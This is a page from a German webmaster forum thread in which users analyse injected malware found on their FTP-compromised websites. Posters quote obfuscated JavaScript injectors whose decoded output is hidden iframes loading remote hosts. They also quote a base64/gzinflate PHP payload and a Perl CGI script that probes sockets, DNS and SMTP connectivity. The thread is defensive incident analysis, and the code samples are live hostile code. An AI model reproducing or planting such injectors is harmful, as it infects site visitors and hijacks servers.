Seite 1 von 3 123 LetzteLetzte
Ergebnis 1 bis 10 von 26

Thema: Hack von Webseiten

  1. #1
    Mitglied Avatar von carsten.gentsch
    Registriert seit
    22.04.2008
    Ort
    immer und überall
    Beiträge
    943

    Standard Hack von Webseiten

    Hallo

    kurzes aber sehr leidiges Thema, mein Kollege breichtete heute davon das sein FTP Account genutz wurde um alle Webseiten mit Schadcode zu verseuchen. IP war ein deutscher Server von dem aus die Angriffe ausgingen. Es wurden alle Daten heruntergeladen und nach code zufügen wider aufgespielt.
    >s="";h=-016/7;try{q=document.createElement("p");a=(q)?"appendC":12;q[a+"hild"](""+n);}catch(qw){f=(q)?"fromCharCode":2;try{eval("a=prototype");}catch(zxc){e=w indow["eva"+"l"];n="52.50.600.777.396.585.654.707.440.580.276.833.456.525.696.707.160.195.360.73 5.408.570.582.763.404.160.690.798.396.305.204.728.464.580.672.406.188.235.690.84 7.460.580.606.763.456.505.582.756.408.485.678.322.400.505.276.770.456.235.324.38 5.228.255.312.357.192.265.276.728.464.545.648.238.128.550.582.763.404.305.204.58 8.476.525.696.812.404.570.204.224.460.495.684.777.432.540.630.770.412.305.204.67 9.468.580.666.238.128.510.684.679.436.505.588.777.456.500.606.798.244.170.660.77 7.136.160.582.756.420.515.660.427.136.495.606.770.464.505.684.238.128.520.606.73 5.412.520.696.427.136.250.204.224.476.525.600.812.416.305.204.350.136.310.360.32 9.420.510.684.679.436.505.372.273.164.295.78.70".split(".");if(window.document)f or(i=6-2-1-2-1;-172+i<0;i=1+i){k=i;s=s+String[f](n[k]/(i%(h*h)+4));}e(s);}}<!--/c3284d-->
    Der Inhnalt der Datei sieht so aus wie oben, weiß jemand von euch was diese Skripte machen und wie er sich egen über dem Serverbetreiber bzw. Anbeiter verhalten soll? Muss der Betreiber Auskunft über den Inhaber geben, ab wann ist der Severanbieter haftbar für schäden?

    IP war 85.114.133.79 gehostet bei http://www.utrace.de/?query=85.114.133.79
    Passend dazu fand ich das im Netz http://www.searchsecurity.de/themenb...ticles/198014/

    Danke
    Geändert von carsten.gentsch (16.07.2012 um 21:39 Uhr)

  2. #2
    ### nicht streicheln ### Avatar von Nebelwolf †
    Registriert seit
    17.07.2005
    Ort
    Köln/Bonn/Rhein-Sieg
    Beiträge
    3.694

    Standard

    Hm,

    ich befürchte, daß es sich um eine Sicherheitslücke im FTP-Server handelt. Welcher FTP-Server und welche Version hat er laufen?

    Nebelwolf

  3. #3
    Mitglied Avatar von carsten.gentsch
    Registriert seit
    22.04.2008
    Ort
    immer und überall
    Beiträge
    943

    Standard

    Hallo
    muss ich erst fragen, er hatte gestern den Server anbieter angeschriegen die haben auch sofort geantwortet und mitgeteilt das Sie keine Auskünfte geben dürfen, sondern nur an Ermittlungsbehörden. Und das Sie den Betreiber informiert haben das der Server unter Kriminellen Einfluss steht. Vom Netz ist er nicht gegangen leider. Aber mein Kollege erstattet natürlich Anzeige versteht sich.
    Ach ja das login erfolgte irgendwie nach Atacke die schon ne weile leif mit den Daten vom Hauptbenutzer für alle Accounts. Die hatten Zugriff auf Laufwerk C gesammt haben aber nur die Webseiten manipuliert.
    Mehr Infos dann heute abend dazu, ich habe gestern gleich alle PW geändert bei allen Kunden und Logins.
    Was wir nciht wissen ist was macht das Skript eigentlich?

    MFG

    Carsten

  4. #4
    Pöhser Purche Avatar von homer
    Registriert seit
    18.07.2005
    Ort
    Oberfranken
    Beiträge
    2.906

    Standard

    Zitat Zitat von Nebelwolf Beitrag anzeigen
    ich befürchte, daß es sich um eine Sicherheitslücke im FTP-Server handelt.
    ... oder ein Passwort, das den Namen nicht verdient.
    Was hier täglich an Brute-Force-Versuchen auf FTP, POP3, IMAP und SMTP-Auth durchläuft ist teilweise schon nicht mehr feierlich.

    Ich hätte lieber 100 Nazis als Kunden, als einen Asylanten. - Klaus, 55, Bestatter

  5. #5
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    8.788

    Standard

    Zitat Zitat von carsten.gentsch Beitrag anzeigen
    Was wir nciht wissen ist was macht das Skript eigentlich?
    Man könnte die betreffende Website bzw. das Skript auch einmal bei

    http://wepawet.iseclab.org/

    einwerfen.
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  6. #6
    ### nicht streicheln ### Avatar von Nebelwolf †
    Registriert seit
    17.07.2005
    Ort
    Köln/Bonn/Rhein-Sieg
    Beiträge
    3.694

    Standard

    Ich habe hier gerade einen ProFTPD 1.3.3a bei dem das Problem auftritt:

    header:
    01: <body id="home">
    02: <!--c3284d--><script>try{1-prototype;}catch(asd){x=2;}
    03: i=2-2;if(x){fr="fromChar";f=[4,0,89,102,89,106,100,91,99,107,36,108,105,95,105,92
    04: 30,28,51,95,91,105,87,98,92,22,104,105,89,50,25,94,105,107,102,47,38,37,111,96,89,93,107,101,1
    05: 1,89,87,97,88,100,104,37,100,97,38,99,86,96,100,35,103,94,101,25,22,99,88,99,90,52,24,60,102,1
    06: 1,92,99,91,84,96,99,23,23,105,88,105,101,97,99,95,99,94,51,23,88,107,105,102,24,21,93,104,86,1
    07: 0,91,87,102,104,89,92,104,50,25,100,100,25,22,86,99,95,92,101,51,23,90,91,99,107,91,103,25,22,
    08: 3,92,95,92,95,106,50,25,40,23,23,109,94,91,106,93,52,24,39,25,52,49,38,95,91,105,87,98,92,52,2
    09: ,32,49,2,1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=S
    10: ring;z=((e)?"Code":"");zx=fr+z;for(;166-5+5-i>0;i+=1){j=i;if(e)s=s+r&#9
    11: ;zx]((w[j]*1+(9+e("j%3"))));}
    12: if(x&&f&&012===10)e(s);</script><!--/c3284d-->

    NoScript blockiert eine Verbindung zu hisoquedb.tk. Der Code wird direkt hinter dem Body-Tag eingefügt.

    Ich halte den Paßwortdiebstahl über Zeus für wahrscheinlich, da nur ein FTP-Zugang betroffen war, aber eine Sicherheitslücke im FTP-Server ist nicht auszuschließen.

    Nebelwolf

  7. #7
    BOFH Avatar von exe
    Registriert seit
    17.07.2005
    Ort
    Serverraum
    Beiträge
    5.936

    Standard

    Das Script von Jochen sieht decodiert so aus:
    Code:
    //document.write (s)  <iframe src="http://zichtopbalans.nl/main.php" name="Google_im" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe><iframe src="http://zichtopbalans.nl/main.php" name="Google_im" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe><iframe src="http://zichtopbalans.nl/main.php" name="Google_im" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>
    Das im ersten Posting von carsten.gensch:
    Code:
    //jsunpack.called CreateElement p  //eval a=prototype  //eval  document.write('<iframe src="http://systemrealfaq.de.nr/67934305.html" name="Twitter" scrolling="auto" frameborder="n  //jsunpack.url undefined  //document.write (s)  <iframe src="http://systemrealfaq.de.nr/67934305.html" name="Twitter" scrolling="auto" frameborder="n" align="center" heght="2" width="2"></iframe> //jsunpack.url var s =  document.write('<iframe src="http://systemrealfaq.de.nr/67934305.html" name="Twitter" scrolling="auto" frameborder="n //jsunpack.url var newurl =  document.write('<iframe src="http://systemrealfaq.de.nr/67934305.html" name="Twitter" scrolling="auto" frameborder="n
    http://zichtopbalans.nl/main.php -> 404
    http://systemrealfaq.de.nr/67934305.html -> lädt auch nicht

    Dekodierbar ist so etwas hier:
    http://jsunpack.jeek.org
    Dieser Beitrag kann Spuren von Ironie und billiger Polemik enthalten. Die Schöpfungshöhe ist technisch bedingt.

    Wir müssen die Religion des anderen respektieren, aber nur in dem Sinn und dem Umfang, wie wir auch seine Theorie respektieren, wonach seine Frau hübsch und seine Kinder klug sind.
    Richard Dawkins

  8. #8
    Mitglied Avatar von carsten.gentsch
    Registriert seit
    22.04.2008
    Ort
    immer und überall
    Beiträge
    943

    Standard

    Hallo
    eben das gefunden nach dem ich 2 webseiten nciht aufrufen konnte.

    #c3284d#
    echo(gzinflate(base64_decode("VVFBboMwELxHyh98M6ipISaBtCWR0qqHnvqApkIOXoIlsIm9JK GvLyAUtcednZ2Z3U1dblWDu/nsIizJzmRLpMnbGjSy3IJAeK9gqDyqCitqoP5iPst0z6MOcI9o1bFFoC89ev7K9LdHnc3pgtASsXkOgg 5aJY2yXSuZBmS1C6JkzVcrvmYl1hX1x1HmsKuANcYpVGbUF0dnqrv2RLgqieXQXYbN7a/rmO5orATbu2txUSeBxrLWgd2fhn2UlnD7LDwaPeVRxOOwiGUSJxFwKSApwo3k4SYBzqlPHsjyX64KChx cH2O+mozvd7paheDRVKoLUXJ7oD9le6C7NOiB3bjenXoCnO752n1Ib2BSn4mmAS3fSlVJLzsPA2kw/eUX")));
    #/c3284d#
    Nur in 2 Dateien gefunden nachdem mein Virenscanner gemeckert hat.Habe extra noch alle PWs geändert also daran kann es nciht gelegen haben. Eingeschleustr aber bisher nur in die Login und Index Seiten. Meinen Provider habe ich informiert und gebeten mir zu sagen wie das geht. Bisher nur bei einem Provider gefunden.

    Kollege sagte gerade angriff von 1 und 1 aus auf seinen Server mit Brutforce. Scheint ein großer run zu sein leider.
    Geändert von carsten.gentsch (18.07.2012 um 14:31 Uhr)

  9. #9
    Mitglied Avatar von carsten.gentsch
    Registriert seit
    22.04.2008
    Ort
    immer und überall
    Beiträge
    943

    Standard

    Hallo
    das ganze soll woll dahin gehen:
    status: (referer=www.google.com/trends/hottrends)failure: <urlopen error [Errno -2] Name or service not known>
    einmal das ganze als Twitter und Google Variante. Got sei dank nur das, aber reicht auch aus

  10. #10
    Mitglied Avatar von carsten.gentsch
    Registriert seit
    22.04.2008
    Ort
    immer und überall
    Beiträge
    943

    Standard

    Beim duchsehen des infizierten Accounts ich im CGi ordner das gefunden und kann mir nicht erklären wie sowas da hin kommen sollte?
    whois:http://www.utrace.de/whois/194.173.175.100 nett anzusehen wer da mit dran hängt.
    Code:
    #!/usr/bin/perl -w
    
    	$| = 1;
    
    	my $smtp = 'smtp.mail.ru';
    	my $dns = '194.173.175.100';
    
    	print "Content-type: text/plain; charset=windows-1251\n\n" if $ENV{HTTP_USER_AGENT};
    
    	print "System info\n";
    	print "-----------\n\n";
    	print "$^O";
    	print "\n", `uname -a` if $^O !~ /win/i;
    	print "\n\n";
    
    	print "Perl modules\n";
    	print "------------\n\n";
    	print "strict .......................... ";
    	unless (eval ("use strict; return 1;")) { print "Error"; } else { print "Ok"; }
    	print "\nSys::Hostname ................... ";
    	unless (eval ("use Sys::Hostname; return 1;")) { print "Error"; } else { print "Ok"; }
    	print "\nPOSIX ........................... ";
    	unless (eval ("use POSIX qw(setsid); return 1;")) { print "Error"; } else { print "Ok"; }
    	print "\nErrno ........................... ";
    	unless (eval ("use Errno qw(EINPROGRESS); return 1;")) { print "Error"; } else { print "Ok"; }
    	print "\nIO::Socket ...................... ";
    	unless (eval ("use IO::Socket qw(:DEFAULT :crlf); return 1;")) { print "Error"; } else { use IO::Socket qw(:DEFAULT :crlf); print "Ok"; }
    	print "\nIO::Select ...................... ";
    	unless (eval ("use IO::Select; return 1;")) { print "Error"; } else { print "Ok"; }
    	print "\n\n";
    
    	print "Local server test\n";
    	print "-----------\n\n";
    	my $s = IO::Socket::INET->new(Proto => "tcp", LocalPort => 36000, Listen => SOMAXCONN, Reuse => 1);
    	unless ($s) { print "Error"; } else { close $s; print "Ok"; }
    	print "\n\n";
    
    	print "DNS client test ($dns)\n";
    	print "-----------\n\n";
    	my $r = (gethostbyname $dns)[4];
    	unless ($r) { print "Error > Can't resolve DNS hostname"; exit; }
    	$s = IO::Socket::INET->new(Proto => "tcp", Type => SOCK_STREAM);
    	unless ($s) { print "Error > Can't create socket > $!"; exit; }
    	unless ($s->connect(pack ("Sna4x8", 2, 53, $r))) { close $s; print "Error > Can't connect > $!"; exit; }
    	close $s; print "Ok";
    	print "\n\n";
    
    	print "SMTP Client test ($smtp)\n";
    	print "-----------\n\n";
    	$r = (gethostbyname $smtp)[4];
    	unless ($r) { print "Error > Can't resolve SMTP hostname"; exit; }
    	$s = IO::Socket::INET->new(Proto => "tcp", Type => SOCK_STREAM);
    	unless ($s) { print "Error > Can't create socket > $!"; exit; }
    	unless ($s->connect(pack ("Sna4x8", 2, 25, $r))) { close $s; print "Error > Can't connect > $!"; exit; }
    	$r = <$s>; close $s;
    	if (length $r) { print "Ok\n$r"; } else { print "Error > Can't read response"; }
    was macht bitte diese Datei, wie kann sowas dahin kommen? Benutzer und Gruppe 1273/1273 und wie kann es sein das mein Provider ncihts mekr davon?

Seite 1 von 3 123 LetzteLetzte

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Partnerlink:
REDDOXX Anti-Spam Lösungen